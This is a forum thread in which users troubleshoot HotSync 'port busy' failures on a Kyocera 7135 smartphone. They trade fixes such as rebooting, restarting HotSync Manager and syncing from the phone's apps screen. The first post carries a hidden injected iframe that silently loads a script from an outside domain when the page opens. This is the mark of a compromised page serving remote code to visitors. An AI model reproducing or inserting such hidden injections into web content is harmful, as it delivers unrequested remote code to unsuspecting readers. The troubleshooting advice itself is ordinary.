+ Reply to Thread
Results 1 to 8 of 8
  1. #1
    I-300 Novice
    Join Date
    04-12-2002
    Location
    Grosse Pointe Woods (Detroit), Michigan
    Posts
    210

    Kyocera 7135 HotSync Problems

    I have been having problems with my hot sync not working (activating at all).

    I have reloaded the Palm Desktop from the Kyocera and have also tried pluuging my cradle into different USB and COM ports.

    I know there is probably something really stupid I am missing. If anyone has any ideas or a link to a websie for Palm idiots, let me know. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

  2. #2
    Registered User
    Join Date
    06-24-2002
    Posts
    47
    I've been experiencing the same problems. I get an error that says something about the port being busy. Of course now that I'd like to recreate the 'error' and document it properly, I can't seem to get it to happen. Of course!!

  3. #3
    Registered User
    Join Date
    04-15-2003
    Posts
    4
    I have a Palm IIIc and moved to the 7135. I initially thought I had the same problem, but fixed it doing the following:

    My IIIc is plugged into COM1, and the 7135 into USB. I plugged in the 7135 cradle and inserted the phone. I then installed the software.

    The software detected the old Hotsync application, and uninstalled it before installing itself (for USB support which I didn't have). This didn't work.

    Then I rebooted the pc.

    Everything is fine now. In fact I can sync both the 7135 and IIIc one after the other no problem.

    Bill

  4. #4
    Registered User
    Join Date
    06-24-2002
    Posts
    47
    Unfortunately, that doesn't seem to be the fix for me. I've only used the 6035 to sync prior to this phone(serial only). I sync both at work and at home on a different computer each place. I tried to sync before I left work this evening, and the 'port was busy'. Came home and hours later tried again at home, and the 'port was busy'.

  5. #5
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Sorry to hear about your HotSync troubles. I get the 'port busy' error message periodically when I have been doing lots of work on the Palm and syncing frequently. Generally, closing the HotSync manager on the PC and then re-opening it will fix it. Every now and then I have to try a soft reset on the Kyo at the same time. I have never (knock on wood!) had it not go away after this. I'm not certain from your description whether you have already tried these things? (To close HotSync, click the red and blue circle in your systray and choose Exit. To restart, go to your Program menu, find the Palm Desktop, and open HotSync Manager.)

  6. #6
    DRC
    DRC is offline
    Registered User
    Join Date
    12-20-2002
    Posts
    51
    I notice that when I have the "port is in use" problem, it is always from pressing the hotsync button on the docking station.

    So far, launching hotsync from the apps screen and initiating the hotsync that way has always worked. Even if the station button is failing consistently.

    I DO have the default button setting (hotsync) so it is something IN the phone handling of the button press vs hotsync program itself.

    I'll forward this to Kyocera, as well, and post any response.
    DRC

  7. #7
    Registered User
    Join Date
    08-24-2001
    Posts
    281
    Has anyone noticed their 7135 much slower when syncing via IR as compaired to the 6035?

    --terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

  8. #8
    Registered User
    Join Date
    08-24-2001
    Posts
    281
    I found another thread that shows that others are having the same problems, next time I'll search more before I reply....


    --terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts